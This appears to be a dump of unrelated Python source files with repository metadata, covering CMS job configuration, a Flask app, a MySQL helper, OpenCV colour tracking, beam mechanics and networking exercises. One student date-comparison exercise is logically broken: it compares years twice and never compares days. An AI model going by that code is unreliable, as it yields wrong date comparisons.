# Reference sizes, kept disabled for manual use:
#CreateFile(0,"EmptyFile") #for Empty file
#CreateFile(512,"512BytesFile") #for 500Bytes file
#CreateFile(51200,"50KBFile") #for 50KB file
#CreateFile(131072,"128KBFile") #for 128KB file
#CreateFile(1048576,"1MBFile") #for 1MB file
#CreateFile(10485760,"10MBFile") #for 10MB file
#CreateFile(1073741824,"1GBFile") #for 1GB file
# Per-testcase fixture files: the name encodes testcase id and size.
# NOTE(review): zero-padding is inconsistent for TC25-TC28, and ids
# TC038/TC043/TC044/TC046 are intentionally(?) absent — confirm with the
# testbed's case list.
CreateFile(512,"TC001_512BytesFile")
CreateFile(1048576,"TC002_1MBFile")
CreateFile(512,"TC003_512BytesFile")
CreateFile(1048576,"TC004_1MBFile")
CreateFile(1048576,"TC005_1MBFile")
CreateFile(512,"TC006_512BytesFile")
CreateFile(1048576,"TC007_1MBFile")
CreateFile(512,"TC008_512BytesFile")
CreateFile(51200,"TC009_50KBFile")
CreateFile(51200,"TC010_50KBFile")
CreateFile(131072,"TC011_128KBFile")
CreateFile(51200,"TC012_50KBFile")
CreateFile(51200,"TC013_50KBFile")
CreateFile(51200,"TC014_50KBFile")
CreateFile(51200,"TC015_50KBFile")
CreateFile(51200,"TC016_50KBFile")
CreateFile(51200,"TC017_50KBFile")
CreateFile(51200,"TC018_50KBFile")
CreateFile(51200,"TC019_50KBFile")
CreateFile(51200,"TC020_50KBFile")
CreateFile(51200,"TC021_50KBFile")
CreateFile(0,"TC022_EmptyFile")
CreateFile(51200,"TC023_50KBFile")
CreateFile(131072,"TC024_128KBFile")
CreateFile(512,"TC25_512BytesFile")
CreateFile(512,"TC26_512BytesFile")
CreateFile(512,"TC27_512BytesFile")
CreateFile(512,"TC28_512BytesFile")
CreateFile(51200,"TC029_50KBFile")
CreateFile(51200,"TC030_50KBFile")
CreateFile(51200,"TC031_50KBFile")
CreateFile(51200,"TC032_50KBFile")
CreateFile(512,"TC033_512BytesFile")
CreateFile(512,"TC034_512BytesFile")
CreateFile(512,"TC035_512BytesFile")
CreateFile(512,"TC036_512BytesFile")
CreateFile(512,"TC037_512BytesFile")
CreateFile(512,"TC037a_512BytesFile")
CreateFile(512,"TC037b_512BytesFile")
CreateFile(512,"TC037c_512BytesFile")
CreateFile(1048576,"TC039_1MBFile")
CreateFile(512,"TC040_512BytesFile")
CreateFile(512,"TC041_512BytesFile")
CreateFile(512,"TC042_512BytesFile")
CreateFile(512,"TC045_512BytesFile")
CreateFile(512,"TC047_512BytesFile")
| [
"isilon-cifs@calsoftinc.com"
] | isilon-cifs@calsoftinc.com |
d4e19a35e16287496ee9fe5568332821313357ed | d785e993ed65049c82607a1482b45bddb2a03dda | /fakeable/fake_DoubleMuon_E_cfg.py | 14da36115cb68c18932fd22ecd5a9e27a8752300 | [] | no_license | PKUHEPEWK/ssww | eec02ad7650014646e1bcb0e8787cf1514aaceca | a507a289935b51b8abf819b1b4b05476a05720dc | refs/heads/master | 2020-05-14T04:15:35.474981 | 2019-06-28T23:48:15 | 2019-06-28T23:48:15 | 181,696,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
# CRAB3 job configuration: runs the fakeable-object NanoAOD post-processing
# script over the 2016 Run E DoubleMuon dataset.
config = Configuration()

config.section_("General")
config.General.requestName = 'fake_DoubleMuon_E'
config.General.transferLogs= True

config.section_("JobType")
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'PSet.py'
config.JobType.scriptExe = 'crab_script.sh'
config.JobType.inputFiles = ['crab_fake_data_script.py','ssww_keep_and_drop.txt','ssww_output_branch_selection.txt','haddnano.py'] #hadd nano will not be needed once nano tools are in cmssw
config.JobType.sendPythonFolder = True

config.section_("Data")
config.Data.inputDataset = '/DoubleMuon/Run2016E-Nano14Dec2018-v1/NANOAOD'
#config.Data.inputDBS = 'phys03'
config.Data.inputDBS = 'global'
config.Data.splitting = 'LumiBased'
#config.Data.splitting = 'EventAwareLumiBased'
config.Data.unitsPerJob = 60
# Certified-lumi (golden JSON) mask for the 2016 ReReco.
config.Data.lumiMask = 'https://cms-service-dqm.web.cern.ch/cms-service-dqm/CAF/certification/Collisions16/13TeV/ReReco/Final/Cert_271036-284044_13TeV_23Sep2016ReReco_Collisions16_JSON.txt'
config.Data.outLFNDirBase = '/store/user/%s/nano2016' % (getUsernameFromSiteDB())
config.Data.publication = False
config.Data.outputDatasetTag = 'fake_DoubleMuon_E'

config.section_("Site")
config.Site.storageSite = "T2_CH_CERNBOX"
#config.Site.storageSite = "T2_CH_CERN"

#config.section_("User")
#config.User.voGroup = 'dcms'
| [
"jiexiao@pku.edu.cn"
] | jiexiao@pku.edu.cn |
97f367d457b883c623e9ef127177e267ac029527 | c06e097c5f2a019ac1de5bc1d15c2eafb339658d | /backend/src/app.py | d5ce04f0c2973be78261ec8004c0c26ca51e95de | [] | no_license | edwinkys/stock-analytic | 0d39a9832e281612724d6aa1e283dcabae83766f | 96209147710c692328141e7083c23b56eb548727 | refs/heads/main | 2023-03-30T08:43:30.041235 | 2021-04-06T17:58:41 | 2021-04-06T17:58:41 | 333,241,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | '''
API Main Source Code
'''
from flask import Flask
from flask_cors import CORS
# Import blueprints
from src.blueprints.stock.endpoints import stock
def create_app(settings_override=None):
    '''
    Create and configure the Flask back-end app.

    @settings_override: mapping of settings that override the values loaded
        from config.settings and the instance settings.py.
    return: configured Flask app.
    '''
    app = Flask(__name__, instance_relative_config=True)
    app.config.from_object('config.settings')
    # The instance-folder settings.py may be absent; silent=True tolerates that.
    app.config.from_pyfile('settings.py', silent=True)
    if settings_override:
        app.config.update(settings_override)
    # Register blueprints
    app.register_blueprint(stock)
    # Register extensions (currently CORS)
    extensions(app)
    return app
def extensions(app):
    '''
    Attach Flask extensions to the app (currently only CORS).

    @app: Flask app.
    return: None.
    '''
    # Initialize extensions
    cors = CORS()
    # Bind them to the app
    cors.init_app(app)
    return None
| [
"itsedwinkys@gmail.com"
] | itsedwinkys@gmail.com |
d53d3a96ba0dd0cbcf815b7d8a30d78950c17a66 | b85676666101e049440cc33c4ad2a3e58eab5580 | /common/conndb.py | 29ff6e2c346c2673457aa30c09e90ffb64c546ef | [] | no_license | zzxx59342506/python-excelimporter | f0a624ea0a0b7d7f19bddb425db40ad207f53ca6 | 4eac92b06f4b57f56020ccd3f965438538db93ef | refs/heads/master | 2023-04-23T01:08:18.370207 | 2021-05-09T10:36:43 | 2021-05-09T10:36:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,069 | py | # connect to mysql
import pymysql
import os
from common.handleconfig import HandleConfig
class ConnDB():
    """Thin pymysql wrapper whose connection parameters come from the
    project's config file (section selected by [global] use_server)."""

    def __init__(self):
        self.HandleConfig = HandleConfig()
        self.server = self.HandleConfig.handle_config("g", "global", "use_server")
        self.host = self.HandleConfig.handle_config('g', self.server, 'host')
        self.user = self.HandleConfig.handle_config('g', self.server, 'user')
        self.passwd = self.HandleConfig.handle_config('g', self.server, 'password')
        self.port = int(self.HandleConfig.handle_config('g', self.server, 'port'))

    def conndb(self, db=None, charset='utf8'):
        """Open and return a pymysql connection to `db` (name kept on self)."""
        self.db = db
        conn = pymysql.connect(host=self.host, user=self.user, passwd=self.passwd, port=self.port, charset=charset, database=db)
        return conn

    def exec(self, conn, sql, kill=False, COMMAND=None):
        """Run each ';'-separated statement of `sql` on `conn`, then commit.

        With kill=True, first kills every MySQL thread that uses the current
        database (plus sleeping threads when COMMAND is truthy). Returns the
        (closed) cursor.
        """
        cur = conn.cursor()
        database = self.db
        if kill:
            # NOTE(review): the database name is string-interpolated, not
            # parameterized; acceptable only because it comes from our own
            # trusted config, never from user input.
            killsql = "SELECT CONCAT('kill ',id) FROM information_schema.`PROCESSLIST` WHERE DB = '{}'".format(database)
            if COMMAND:
                killsql = "SELECT CONCAT('kill ',id) FROM information_schema.`PROCESSLIST` WHERE DB = '{}' OR COMMAND = 'Sleep'".format(database)
            cur.execute(killsql)
            # Each fetched row is ("kill <id>",); run them one by one.
            for row in cur.fetchall():
                cur.execute(list(row)[0])
        for s in sql.split(";"):
            if s != "":
                cur.execute(s)
        conn.commit()
        cur.close()
        return cur

    def cmd(self, db, op, file):
        """Import `file` into `db` through the mysql CLI.

        Returns os.system()'s exit status, or None for unsupported `op`
        values (the original raised UnboundLocalError in that case).
        """
        ret = None
        if op == "mysql":
            # NOTE(review): shell command built by string interpolation and
            # it embeds the password; config values must remain trusted.
            cmd_statement = "{0} -u{1} -p{2} -h{3} -P{4} {5} --default-character-set=utf8 < \"{6}\"".format(op,self.user,self.passwd,self.host,self.port,db,file)
            print(cmd_statement)
            ret = os.system(cmd_statement)
        return ret
"xiaobo.zhang@dev.neoncrm.com"
] | xiaobo.zhang@dev.neoncrm.com |
f9cb2443b7fe489c327c6d699ea1a85004394c9b | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/127/usersdata/251/36337/submittedfiles/ex11.py | 8b0f6fb148ea3944e979a9c5fa90a71cb8f5fb1b | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | # -*- coding: utf-8 -*-
dia1 = int(input('Digite o dia da primeira data: '))
mes1 = int(input('Digite o mês da primeira data: '))
ano1 = int(input('Digite o ano da primeira data: '))
dia2 = int(input('Digite o dia da segunda data: '))
mes2 = int(input('Digite o mês da segunda data: '))
ano2 = int(input('Digite o ano da segunda data: '))
if ano1>ano2:
print('DATA 1')
elif ano2>ano1:
print('DATA 2')
else:
if mes1>mes2:
print('DATA 1')
elif mes2>mes1:
print('DATA 2')
else:
if ano1>ano2:
print('DATA 1')
elif ano2>ano1:
print('DATA 2')
else:
print('IGUAIS') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
70954f8acfa28f88fc48ed29c864438711c7a04b | af030f2740f8e8b2de7e5013e9a4f8c3bee26ba2 | /models/omes/Detec-objet/08/program07.py | 6de833026582fdc0f8a6939cc9f3083e796f0c64 | [] | no_license | Jhongesell/detertor-de-poligonos-y-sus-parametros | a419145ad9ca4948c5187e2abf77f1fa54c12e45 | 0a288120f58ab1dd35025bbb7176fc159daf3bd7 | refs/heads/main | 2023-04-27T05:15:34.345057 | 2021-05-17T03:18:05 | 2021-05-17T03:18:05 | 344,097,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,837 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 22:38:29 2021
@author: jhongvp
"""
import cv2
import numpy as np
def dibujar(mask,color):
    # Draw the centroid and convex hull of every sufficiently large blob in
    # `mask` onto the global `frame` (uses the global `font` as well).
    # NOTE(review): `color` is accepted but never used -- all drawing colours
    # below are hard-coded; confirm whether it should feed cv2.drawContours.
    contornos,_ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    for c in contornos:
        area=cv2.contourArea(c)
        if area > 3000:  # skip small noise blobs
            # Image moments give the centroid; guard against a zero area
            # (m00 == 0) to avoid division by zero.
            M=cv2.moments(c)
            if (M["m00"]==0): M["m00"]=1
            x=int(M["m10"]/M["m00"])
            y=int(M['m01']/M["m00"])
            nuevoContorno=cv2.convexHull(c)
            cv2.circle(frame,(x,y),7,(50,100,4),-1)
            cv2.putText(frame,'{},{}'.format(x,y),(x+10,y), font, 0.75,(0,0,255),1,cv2.LINE_AA)
            cv2.drawContours(frame,[nuevoContorno], 0, (0,255,0), 3)
cap=cv2.VideoCapture(1)
azulBajo = np.array([105,100,20],np.uint8)
azulAlto = np.array([125,255,255],np.uint8)
amarilloBajo = np.array([25,100,20],np.uint8)
amarilloAlto = np.array([35, 255, 255],np.uint8)
#redBajo1 = np.array([0,100,20],np.uint8)
#redAlto1 = np.array([5,255,255],np.uint8)
#redBajo2 = np.array([175, 100, 20],np.uint8)
#redAlto2 = np.array([179,255,255],np.uint8)
font = cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, frame=cap.read()
if ret==True:
frameHSV = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
maskAzul = cv2.inRange(frameHSV,azulBajo,azulAlto)
maskAmarillo = cv2.inRange(frameHSV,amarilloBajo,amarilloAlto)
#maskRed1 = cv2.inRange(frameHSV,redBajo1,redAlto1)
#maskRed2 = cv2.inRange(frameHSV,redBajo2,redAlto2)
#maskRed = cv2.add(maskRed1, maskRed2)
dibujar(maskAzul,(255,0,0))
dibujar(maskAmarillo,(0,255,255))
#dibujar(maskRed,(0,0,255))
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('s'):
break
cap.release()
cv2.destroyAllWindows()
| [
"unmsm182@gmail.com"
] | unmsm182@gmail.com |
9ad166212a3248adff0e4a11a45c752872e01190 | 5eac0e97297f557fc49b7352ec11953a69f92c57 | /PyNite/BeamSegment.py | 7a3841c82d693d8e10f569a86ba9b3368e084793 | [
"MIT"
] | permissive | FJFranklin/PyNite | bb27606602724701484bacbbdd75688aa57159d4 | de06b8a5020f845e77f5ffa8e3033ab0891d45cc | refs/heads/master | 2021-07-12T04:37:02.651970 | 2020-10-11T17:45:24 | 2020-10-11T17:45:24 | 198,198,708 | 0 | 0 | MIT | 2019-07-22T10:14:06 | 2019-07-22T10:14:05 | null | UTF-8 | Python | false | false | 9,833 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 6 20:52:31 2017
@author: D. Craig Brinck, SE
"""
# %%
# A mathematically continuous beam segment
class BeamSegment():
"""
A mathematically continuous beam segment
Properties
----------
x1 : number
The starting location of the segment relative to the start of the beam
x2 : number
The ending location of the segment relative to the start of the beam
w1 : number
The distributed load magnitude at the start of the segment
w2 : number
The distributed load magnitude at the end of the segment
p1 : number
The distributed axial load magnitude at the start of the segment
p2 : number
The distributed axial load magnitude at the end of the segment
V1 : number
The internal shear force at the start of the segment
M1 : number
The internal moment at the start of the segment
P1 : number
The internal axial force at the start of the segment
theta1: number
The slope (radians) at the start of the segment
delta1: number
The displacement at the start of the segment
EI : number
The flexural stiffness of the segment
Methods
-------
__init__()
Constructor
Length()
Returns the length of the segment
Shear(x)
Returns the shear force at a location on the segment
Notes
-----
Any unit system may be used as long as the units are consistent with each other
"""
#%%
def __init__(self):
"""
Constructor
"""
self.x1 = None # Start location of beam segment (relative to start of beam)
self.x2 = None # End location of beam segment (relative to start of beam)
self.w1 = None # Linear distributed transverse load at start of segment
self.w2 = None # Linear distributed transverse load at end of segment
self.p1 = None # Linear distributed axial load at start of segment
self.p2 = None # Linear distributed axial load at end of segment
self.V1 = None # Internal shear force at start of segment
self.M1 = None # Internal moment at start of segment
self.P1 = None # Internal axial force at start of segment
self.theta1 = None # Slope at start of beam segment
self.delta1 = None # Displacement at start of beam segment
self.EI = None # Flexural stiffness of the beam segment
#%%
# Returns the length of the segment
def Length(self):
"""
Returns the length of the segment
"""
return self.x2 - self.x1
#%%
# Returns the shear force at a location 'x' on the segment
def Shear(self, x):
V1 = self.V1
w1 = self.w1
w2 = self.w2
L = self.Length()
return V1-(w2-w1)/(2*L)*x**2-w1*x
#%%
# Returns the moment at a location on the segment
def Moment(self, x):
V1 = self.V1
M1 = self.M1
w1 = self.w1
w2 = self.w2
L = self.Length()
return M1+V1*x-(w2-w1)/(6*L)*x**3-w1*x**2/2
#%%
# Returns the axial force at a location on the segment
def Axial(self, x):
P1 = self.P1
p1 = self.p1
p2 = self.p2
L = self.Length()
return P1+(p2-p1)/(2*L)*x**2+p1*x
#%%
def Slope(self, x):
"""
Returns the slope at a point on the segment
Parameters
----------
x : number
Location (relative to start of segment) where slope is to be calculated
EI : number
Flexural stiffness of the segment
Returns
-------
Slope : number
The slope of the segment (radians) at location "x"
Notes
-----
Any unit system may be used as long as the units are consistent with each other
"""
V1 = self.V1
M1 = self.M1
w1 = self.w1
w2 = self.w2
theta1 = self.theta1
L = self.Length()
EI = self.EI
return theta1 + 1/EI*(M1*x + V1/2*x**2 - (w2-w1)/(24*L)*x**4 - w1/6*x**3)
#%%
# Returns the deflection at a location on the segment
def Deflection(self, x):
V1 = self.V1
M1 = self.M1
w1 = self.w1
w2 = self.w2
theta1 = self.theta1
delta1 = self.delta1
L = self.Length()
EI = self.EI
return delta1 + theta1*x + 1/EI*(M1/2*x**2 + V1/6*x**3 - (w2 - w1)/(120*L)*x**5 - w1/24*x**4)
#%%
# Returns the maximum shear in the segment
def MaxShear(self):
w1 = self.w1
w2 = self.w2
L = self.Length()
# Determine possible locations of maximum shear
if w1-w2 == 0:
x1 = 0
else:
x1 = w1*L/(w1-w2)
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the shear at each location of interest
V1 = self.Shear(x1)
V2 = self.Shear(x2)
V3 = self.Shear(x3)
# Return the maximum shear
return max(V1, V2, V3)
#%%
# Returns the minimum shear in the segment
def MinShear(self):
w1 = self.w1
w2 = self.w2
L = self.Length()
# Determine possible locations of minimum shear
if w1-w2 == 0:
x1 = 0
else:
x1 = w1*L/(w1-w2)
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the shear at each location of interest
V1 = self.Shear(x1)
V2 = self.Shear(x2)
V3 = self.Shear(x3)
# Return the minimum shear
return min(V1, V2, V3)
#%%
# Returns the maximum moment in the segment
def MaxMoment(self):
w1 = self.w1
w2 = self.w2
V1 = self.V1
L = self.Length()
# Find the quadratic equation parameters
a = (w1-w2)/(2*L)
b = -w1
c = V1
# Determine possible locations of maximum moment
if a == 0:
if b != 0:
x1 = -c/b
else:
x1 = 0
x2 = 0
elif b**2-4*a*c < 0:
x1 = 0
x2 = 0
else:
x1 = (-b+(b**2-4*a*c)**0.5)/(2*a)
x2 = (-b-(b**2-4*a*c)**0.5)/(2*a)
x3 = 0
x4 = L
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
if round(x2, 10) < 0 or round(x2, 10) > round(L, 10):
x2 = 0
# Find the moment at each location of interest
M1 = self.Moment(x1)
M2 = self.Moment(x2)
M3 = self.Moment(x3)
M4 = self.Moment(x4)
# Return the maximum moment
return max(M1, M2, M3, M4)
#%%
# Returns the minimum moment in the segment
def MinMoment(self):
w1 = self.w1
w2 = self.w2
V1 = self.V1
L = self.Length()
# Find the quadratic equation parameters
a = (w1-w2)/(2*L)
b = -w1
c = V1
# Determine possible locations of minimum moment
if a == 0:
if b != 0:
x1 = -c/b
else:
x1 = 0
x2 = 0
elif b**2-4*a*c < 0:
x1 = 0
x2 = 0
else:
x1 = (-b+(b**2-4*a*c)**0.5)/(2*a)
x2 = (-b-(b**2-4*a*c)**0.5)/(2*a)
x3 = 0
x4 = L
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
if round(x2, 10) < 0 or round(x2, 10) > round(L, 10):
x2 = 0
# Find the moment at each location of interest
M1 = self.Moment(x1)
M2 = self.Moment(x2)
M3 = self.Moment(x3)
M4 = self.Moment(x4)
# Return the minimum moment
return min(M1, M2, M3, M4)
#%%
# Returns the maximum axial force in the segment
def MaxAxial(self):
p1 = self.p1
p2 = self.p2
L = self.Length()
# Determine possible locations of maximum axial force
if p1-p2 != 0:
x1 = L*p1/(p1-p2)
else:
x1 = 0
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the axial force at each location of interest
P1 = self.Axial(x1)
P2 = self.Axial(x2)
P3 = self.Axial(x3)
# Return the maximum axial force
return max(P1, P2, P3)
#%%
# Returns the minimum axial force in the segment
def MinAxial(self):
p1 = self.p1
p2 = self. p2
L = self.Length()
# Determine possible locations of minimum axial force
if p1-p2 != 0:
x1 = L*p1/(p1-p2)
else:
x1 = 0
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the axial force at each location of interest
P1 = self.Axial(x1)
P2 = self.Axial(x2)
P3 = self.Axial(x3)
# Return the minimum axial force
return min(P1, P2, P3)
| [
"noreply@github.com"
] | FJFranklin.noreply@github.com |
72471ec575910223fb97b0d4630be0fcf1b4fcb7 | aa6ca3602ce2cb2c958bb252aa6e14ea554af453 | /kotti_dkbase/views.py | 0bbc362da5aeefa4cb6209c9b33f7068b305e69a | [
"BSD-2-Clause",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | chrneumann/kotti_dkbase | 20283e03229327a0b58f5971a28dd9b73c920bf7 | 3e3749c9887538bb07b8cd8f842b77b219596191 | refs/heads/master | 2016-08-04T18:55:50.492661 | 2012-08-24T14:20:26 | 2012-08-24T14:20:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | from pyramid.httpexceptions import HTTPInternalServerError
from pyramid_mailer.message import Message
from kotti.message import get_mailer
from kotti import get_settings
def mail_admin(msg):
    """
    Send given message to the admins.

    The recipient address comes from the 'kotti_dkbase.admin_email'
    setting; delivery is synchronous (send_immediately), not queued on
    the current transaction.
    """
    admin = get_settings().get('kotti_dkbase.admin_email')
    message = Message(
        recipients=[admin],
        subject=u'Server-Error',
        body=msg,
    )
    mailer = get_mailer()
    mailer.send_immediately(message)
def exception_decorator(view):
    """
    Transform generic exceptions to Error 500

    Returns a wrapper that invokes `view` with an HTTPInternalServerError
    built from the original exception's message, plus the request.
    """
    def f(exception, request):
        return view(HTTPInternalServerError(str(exception)), request)
    return f
def error_view(exception, request):
    """Handle an HTTP error: mail the admins when the
    'kotti_dkbase.send_error_mails' setting is "True" (404s excluded),
    copy the exception's status code onto the response, and return an
    empty template context."""
    should_mail = get_settings().get('kotti_dkbase.send_error_mails') == "True"
    if should_mail and exception.code != 404:
        mail_admin(str(exception) + str(request))
    request.response.status_int = exception.code
    return {}
| [
"cneumann@datenkarussell.de"
] | cneumann@datenkarussell.de |
4c8926852a17017751bd19f68293508ddb98339c | 3470201aec8d85271c5b10d01385efbe12c13014 | /env.py | c50ac229f24a79fb699fe0bfc486c6c29ecbc652 | [] | no_license | jsundahl/220-project-5 | 5e1465d49f4fe6aebd7e6c2895d469035aad6b58 | b9f935cc77d4ba297dc9535ac6bdbe163bcb7237 | refs/heads/master | 2021-01-18T23:34:24.334310 | 2017-04-07T20:07:02 | 2017-04-07T20:07:02 | 87,118,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,222 | py | class GlobalEnv:
""" Implements a "ribcage" data structure that stores bindings of variables and values as lists.
Attributes:
variables (List): the identifiers
values (List): the associated values bound to the variables
prev (GlobalEnv): a reference to a previous GlobalEnv.
Methods to implement:
__init__ Initializes a new instance of a GlobalEnv.
Args:
prev (GlobalEnv): initialize the variables and values lists, the previous environment is
initialized to the argument.
empty_env A static method that returns the empty GlobalEnv.
Args:
none
Returns:
GlobalEnv: A new instance of a GlobalEnv with None as the previous environment.
lookup Looks up the variable passed to it and returns the associated value.
Args:
symbol (string): A string that is a variable (identifier) that is bound to some value in an environment.
Returns:
value: The value that is bound to the symbol passed in. This can be any object that is stored in the
values list associated with the symbol in a "rib" of the ribcage.
extend Creates a new "rib" in an environment.
Args:
variables (List): a list of variable identifiers.
values (List): a list of values that correspond to the identifiers in the variables list.
Returns:
GlobalEnv: A new instance of a GlobalEnv with "self" as the previous environment.
"""
def __init__(self, prev=None, vars=None, vals=None):
if vals is None:
vals = []
if vars is None:
vars = []
self.variables = vars
self.values = vals
self.prev = prev
    @staticmethod
    def empty_env():
        """Return a fresh, empty global environment (no bindings, no prev)."""
        return GlobalEnv()
    def lookup(self, symbol):
        """Resolve symbol via the module-level lookup() helper; None if unbound."""
        return lookup(self, symbol)
    def extend(self, vars, vals):
        """Return a new rib binding vars to vals, chained onto this environment."""
        return GlobalEnv(self, vars, vals)
class LocalEnv:
    """A local "ribcage" environment.

    Structured like GlobalEnv (parallel variable/value lists plus a link to
    the previous local rib), but additionally holds a reference to the
    global environment, which is consulted whenever a lookup misses in the
    local chain.
    """

    def __init__(self, prev, globalenv=None, vars=None, vals=None):
        """Create a local rib chained to prev; a fresh empty GlobalEnv is
        used when no global environment is supplied."""
        self.prev = prev
        self.globalenv = GlobalEnv.empty_env() if globalenv is None else globalenv
        self.variables = [] if vars is None else vars
        self.values = [] if vals is None else vals

    def lookup(self, symbol):
        """Resolve symbol in the local chain first, then fall back to the
        global environment; None when unbound everywhere."""
        local_hit = lookup(self, symbol)
        return local_hit if local_hit is not None else lookup(self.globalenv, symbol)

    def extend(self, variables, values):
        """Return a new local rib with the given bindings, sharing this
        environment's global reference."""
        return LocalEnv(self, self.globalenv, variables, values)
def lookup(self, symbol):
    """Scan this rib for symbol; on a miss, defer to the previous environment.

    Returns the bound value, or None once the chain is exhausted.
    """
    for var, val in zip(self.variables, self.values):
        if var == symbol:
            return val
    if self.prev is None:
        return None
    return self.prev.lookup(symbol)
if __name__ == '__main__':
    # Smoke test: build a global rib, extend it into a local-style rib,
    # and resolve variables from both the inner and outer scopes.
    g = GlobalEnv.empty_env()
    g = g.extend(['a', 'b'], [1, 2])
    print(g.lookup('a'))
    l = g.extend(['x', 'y'], [3, 4])
    print(l.lookup('a'))
    print(l.lookup('b'))
    print(l.lookup('x'))
    print(l.lookup('y'))
| [
"jsundahl15@gmail.com"
] | jsundahl15@gmail.com |
045fbe74ec8accb45bf9ae2b6c91b56cd97f8a4a | 339809fbc9d3ac7e7073cdaa653d56e3ebca5dd4 | /221801412&221801405/venv/Lib/site-packages/sqlalchemy/dialects/mysql/mariadb.py | 07676f71d6ceaa37b30c5e84f7da7461683c5c75 | [] | no_license | siberia0015/PairProject | b384b62cf7d1f89a5727c7bbb21fe3d93d2881b2 | f99f3f7885b77acade28afd11652a5ed9591ccd6 | refs/heads/main | 2023-04-06T23:39:12.982810 | 2021-04-01T07:52:03 | 2021-04-01T07:52:03 | 349,049,089 | 0 | 51 | null | 2021-04-01T07:52:04 | 2021-03-18T11:33:40 | Python | UTF-8 | Python | false | false | 454 | py | from .base import MySQLDialect
class MariaDBDialect(MySQLDialect):
    """MySQL dialect variant flagged as MariaDB, registered under the
    'mariadb' dialect name."""
    is_mariadb = True
    name = "mariadb"
def loader(driver):
    """Build a MariaDB dialect class for the given DBAPI driver name.

    Imports sqlalchemy.dialects.mysql.<driver>, grabs that driver's dialect
    class, and returns a dynamically created subclass that mixes in
    MariaDBDialect (e.g. MariaDBDialect_pymysql).
    """
    driver_mod = __import__(
        "sqlalchemy.dialects.mysql.%s" % driver
    ).dialects.mysql
    driver_cls = getattr(driver_mod, driver).dialect
    return type(
        "MariaDBDialect_%s" % driver,
        (
            MariaDBDialect,
            driver_cls,
        ),
        {},
    )
| [
"1157928777@qq.com"
] | 1157928777@qq.com |
68a8f0693008a34bc7ee601bf743c19a920c3aa1 | 36803e5ce3921cfe62bfecc15b306f3139eadd87 | /exercises/06_control_structures/task_6_3.py | c4565860256758b0d5808babd55800efa4193c2c | [] | no_license | hasculdr/py_study_new | b4c0550554a45ab850ca0151235767f5876fd2e2 | e0f2ee78c55e41b2c957933177a318af9905290c | refs/heads/master | 2022-10-04T17:48:16.981516 | 2020-06-08T15:57:30 | 2020-06-08T15:57:30 | 270,659,031 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,313 | py | # -*- coding: utf-8 -*-
"""
Задание 6.3
В скрипте сделан генератор конфигурации для access-портов.
Сделать аналогичный генератор конфигурации для портов trunk.
В транках ситуация усложняется тем, что VLANов может быть много, и надо понимать,
что с ним делать.
Поэтому в соответствии каждому порту стоит список
и первый (нулевой) элемент списка указывает как воспринимать номера VLAN,
которые идут дальше.
Пример значения и соответствующей команды:
['add', '10', '20'] - команда switchport trunk allowed vlan add 10,20
['del', '17'] - команда switchport trunk allowed vlan remove 17
['only', '11', '30'] - команда switchport trunk allowed vlan 11,30
Задача для портов 0/1, 0/2, 0/4:
- сгенерировать конфигурацию на основе шаблона trunk_template
- с учетом ключевых слов add, del, only
Код не должен привязываться к конкретным номерам портов. То есть, если в словаре
trunk будут другие номера интерфейсов, код должен работать.
Ограничение: Все задания надо выполнять используя только пройденные темы.
"""
access_template = [
    "switchport mode access",
    "switchport access vlan",
    "spanning-tree portfast",
    "spanning-tree bpduguard enable",
]

trunk_template = [
    "switchport trunk encapsulation dot1q",
    "switchport mode trunk",
    "switchport trunk allowed vlan",
]

access = {"0/12": "10", "0/14": "11", "0/16": "17", "0/17": "150"}

trunk = {"0/1": ["add", "10", "20"], "0/2": ["only", "11", "30"], "0/4": ["del", "17"]}

# Access ports: substitute the VLAN number into the "switchport access vlan" line.
for intf, vlan in access.items():
    print("interface FastEthernet" + intf)
    for command in access_template:
        if command.endswith("access vlan"):
            print(" {} {}".format(command, vlan))
        else:
            print(" {}".format(command))

# Trunk ports (the part the task asks for): the first list element selects
# the form of the allowed-vlan command:
#   add  -> "switchport trunk allowed vlan add 10,20"
#   del  -> "switchport trunk allowed vlan remove 17"
#   only -> "switchport trunk allowed vlan 11,30"
for intf, vlans in trunk.items():
    print("interface FastEthernet" + intf)
    for command in trunk_template:
        if command.endswith("allowed vlan"):
            action = vlans[0]
            vlan_list = ",".join(vlans[1:])
            if action == "add":
                print(" {} add {}".format(command, vlan_list))
            elif action == "del":
                print(" {} remove {}".format(command, vlan_list))
            else:
                print(" {} {}".format(command, vlan_list))
        else:
            print(" {}".format(command))
| [
